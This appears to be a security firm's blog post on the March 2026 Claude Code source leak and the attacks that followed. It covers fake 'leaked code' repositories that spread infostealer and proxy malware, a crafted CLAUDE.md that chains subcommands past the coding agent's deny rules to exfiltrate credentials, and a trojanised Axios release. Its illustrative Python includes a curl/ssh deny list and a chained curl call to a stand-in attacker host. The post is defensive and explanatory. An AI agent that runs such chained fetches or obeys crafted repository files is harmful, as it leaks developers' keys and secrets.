When AI tools become attack vectors:
The Claude Code leak and what followed

7th April 2026 · News · AJ Thompson


In March 2026, Anthropic’s Claude Code source leak became a headline‑grabbing example of just how vulnerable modern AI development tools can be. Within hours, attackers weaponised curiosity around the leak to deploy malware and expose flaws, a chain reaction that highlights why AI coding agent security must now be treated as an enterprise‑level priority.

A packaging mistake that exposed AI coding agent security risks

The last week of March 2026 delivered a stark reminder that, in the race to ship AI products at speed, even the most sophisticated technology companies are not immune to basic human error, and that attackers are watching, ready to exploit the fallout within hours.

On 31 March 2026, Anthropic accidentally published the full client-side source code of Claude Code, its flagship terminal-based AI coding agent, through a packaging mistake in its public npm release. A 59.8 MB JavaScript source map file was inadvertently bundled into version 2.1.88 of the @anthropic-ai/claude-code package, exposing approximately 513,000 lines of unobfuscated TypeScript across nearly 2,000 files. Security researcher Chaofan Shou spotted the issue and flagged it publicly on X within hours, triggering a global scramble by developers, researchers, and threat actors to download, mirror, and analyse the code.
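Packaging mistakes of this kind are usually detectable before publish with a simple pre-release scan of the staged package. The sketch below is illustrative only (the function name and file patterns are our own, not Anthropic's tooling): it flags source maps and similar debug artefacts that should never ship in a public build.

```python
from pathlib import Path
import tempfile

def find_debug_artefacts(pkg_dir: Path) -> list[str]:
    """Scan a staged package directory for source maps and similar
    debug artefacts that should never ship in a public release."""
    patterns = ["*.map", "*.tsbuildinfo"]
    hits = [str(p.relative_to(pkg_dir))
            for pat in patterns
            for p in pkg_dir.rglob(pat)]
    return sorted(hits)

# Simulate a staging directory containing an accidentally bundled map.
staging = Path(tempfile.mkdtemp())
(staging / "cli.js").write_text("// bundled output")
(staging / "cli.js.map").write_text("{}")  # the kind of file that leaked

leaks = find_debug_artefacts(staging)
if leaks:
    print(f"BLOCKED: debug artefacts found, do not publish: {leaks}")
```

Wired into a CI gate, a check like this fails the release before anything reaches the public registry.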

Anthropic moved quickly to confirm the incident, stating that this was a release packaging issue caused by human error, not a security breach, and that no sensitive customer data or credentials were involved. But while the company’s response was measured, the downstream consequences were anything but.

[Infographic: AI coding agent security risks, the Claude Code source leak, malware threats including Vidar and GhostSocks, and cybersecurity safeguards for developer environments]

How hackers turned a packaging error into a malware campaign

What happened next illustrates a pattern that every IT and security leader should understand: the moment a high-profile technology event generates public curiosity, threat actors pivot to exploit that curiosity as a lure.

Within hours of the leak becoming public, malicious GitHub repositories appeared claiming to offer the leaked Claude Code, complete with promises of unlocked enterprise features and no usage restrictions.

Zscaler’s ThreatLabz research team identified the campaign. A repository optimised for search engine discovery appeared at the top of Google results for searches including “leaked Claude Code” and “Claude Code source download”. Curious developers who clicked through did not receive Anthropic’s source code: instead, they executed a Rust-based dropper named ClaudeCode_x64.exe that deployed two distinct malware payloads:

  • Vidar: a commodity infostealer capable of harvesting browser credentials, saved passwords, and cryptocurrency wallet data
  • GhostSocks: proxy malware that conscripts infected machines into residential proxy infrastructure, giving attackers a way to mask their activity through compromised devices

A second repository, linked to the same threat actor operating under a different account, hosted identical payloads — a deliberate multi-channel distribution strategy designed to maximise reach before takedown.

A compounding AI security crisis

The malware campaign was not the only consequence. Security researchers at Adversa AI disclosed a critical vulnerability in Claude Code’s permission system, made far easier to exploit by the leaked source. The flaw allows a crafted CLAUDE.md file in a malicious repository to generate a pipeline of over 50 subcommands, at which point Claude Code’s deny rules, security validators, and command injection detection are entirely bypassed. Attackers could silently exfiltrate SSH keys, AWS credentials, GitHub tokens, and environment secrets from a developer’s workstation simply by having the agent open a specially crafted project.
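The underlying weakness is a familiar one: validators that inspect commands in isolation can be defeated by chaining. The hypothetical sketch below is not Anthropic's actual validator; it simply illustrates why deny-list checks on shell commands are fragile when only the leading token is examined.

```python
import shlex

DENY = {"curl", "ssh", "scp"}  # hypothetical deny list

def naive_is_allowed(command: str) -> bool:
    """Checks only the first token of the command line -- the kind of
    shallow validation that chained subcommands slip straight past."""
    tokens = shlex.split(command)
    return bool(tokens) and tokens[0] not in DENY

# A denied command on its own is caught...
assert not naive_is_allowed("curl http://attacker.example/x")

# ...but the same command hidden behind a benign prefix passes,
# because only 'echo' is ever inspected.
chained = "echo building && curl http://attacker.example/x"
print(naive_is_allowed(chained))  # True: the deny rule is bypassed
```

Robust agent sandboxes therefore need to parse and police the full command pipeline (or better, execute inside an isolated environment), not pattern-match individual commands.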

Separately, a supply chain attack on the Axios npm package coincided almost exactly with the Claude Code leak. Developers who updated via npm on 31 March between 00:21 and 03:29 UTC may have inadvertently pulled a trojanised HTTP client containing a cross-platform remote access trojan. Security teams are strongly advised to rotate all secrets on any workstation that installed or updated npm packages, including Claude Code, during that window.

What enterprise IT leaders must do now

For organisations deploying AI coding agents, this incident should serve as a catalyst for a frank assessment of developer toolchain security. AI agents with local shell access and the ability to execute scripts represent a fundamentally different risk profile to traditional software. When those agents interact with external repositories, the attack surface expands considerably.

At Northdoor, we work with enterprise clients to ensure that the speed of AI adoption does not outpace the security controls needed to protect it.

Three principles should now be non-negotiable:

  1. Developer workstations must be treated as privileged endpoints — not general-purpose machines
  2. AI agents with shell execution capabilities must operate within Zero Trust architecture — with explicit permission boundaries and behavioural monitoring
  3. Any code claiming to be a leaked or unlocked version of a proprietary tool must be verified against official, signed sources only — no exceptions
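The third principle can be enforced mechanically: compare every downloaded artefact against an integrity value obtained from a trusted channel before it is allowed onto a workstation. The sketch below uses a local SHA-256 comparison with illustrative filenames and contents; in practice the published digest comes from the vendor's signed release notes or registry metadata, and for npm packages the registry's own signature-audit tooling provides a registry-backed equivalent.

```python
import hashlib
import tempfile
from pathlib import Path

def sha256_of(path: Path) -> str:
    """Hex SHA-256 digest of a file's contents."""
    return hashlib.sha256(path.read_bytes()).hexdigest()

workdir = Path(tempfile.mkdtemp())
artefact = workdir / "tool-release.tgz"  # hypothetical download
artefact.write_bytes(b"release contents")

# In practice this value comes from the vendor's signed release notes
# or registry metadata, never from the same channel as the download.
published_digest = sha256_of(artefact)

# Pre-install check: the genuine artefact verifies...
assert sha256_of(artefact) == published_digest

# ...while a tampered one is rejected by the same comparison.
artefact.write_bytes(b"trojanised contents")
verified = sha256_of(artefact) == published_digest
print("VERIFIED" if verified else "REJECTED: checksum mismatch, do not install")
```

The design point is the separation of channels: a checksum fetched from the same repository as the download proves nothing, which is exactly how the fake "leaked Claude Code" repositories passed casual inspection.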

The gap between vendor mistake and active attack has never been narrower

The Claude Code leak is a story about speed. In 2026, threat actors do not need to discover vulnerabilities independently — they need only monitor the news cycle and move faster than defenders. Anthropic acknowledged the error and committed to preventing a recurrence, but the malware campaigns, supply chain attack, and newly disclosed vulnerabilities that followed are a reminder that the consequences of an exposure can outlast the original incident by weeks.

For IT leaders, the lesson is not to avoid AI tools — the productivity gains are real and significant. The lesson is to ensure that the governance, monitoring, and access controls surrounding those tools are as sophisticated as the tools themselves.

If your organisation is deploying AI coding agents and has not yet reviewed your developer workstation security posture, speak to the Northdoor team about where to start.

Frequently Asked Questions (FAQs)

What caused the Claude Code source code leak, and was customer data affected?

On 31 March 2026, Anthropic accidentally published the client-side source code for Claude Code (version 2.1.88) due to a packaging error in its npm release process. A large JavaScript source map file was inadvertently included, exposing substantial amounts of unobfuscated TypeScript. Anthropic confirmed this was a release mistake rather than a security breach and that no customer data or credentials were compromised.

Is it safe to download the “leaked” code to study it?

No. As soon as the leak became public, malicious repositories appeared claiming to host the source code. These were used to distribute malware, including infostealers and proxy malware. Developers should only download tools from official, signed sources.

Can a source code leak lead to a direct hack of my computer?

Yes. Security researchers demonstrated that flaws in permission handling within the tool could be exploited using a specially crafted repository. This could allow attackers to bypass security checks and extract sensitive data such as SSH keys, cloud credentials, and tokens from the environment where the agent was running.

How do source code leaks like this typically happen in developer tools?

They are usually caused by packaging mistakes or release misconfigurations. For example, unintentionally including source map files or debug artefacts in a public build can expose proprietary code.

What should organisations do to reduce the risk from AI coding agents?

AI coding agents with shell access should be treated as privileged software. Organisations should:

  • Treat developer workstations as privileged endpoints
  • Apply Zero Trust principles with strict permission boundaries
  • Monitor agent behaviour and repository interactions
  • Only allow tools from verified, signed sources

How can companies protect themselves from these types of supply chain risks?

Organisations should adopt a Zero Trust approach for AI tools with shell access. This includes strict permission boundaries and behavioural monitoring. Developer workstations should be treated as privileged endpoints and secured to a higher standard than typical office devices.

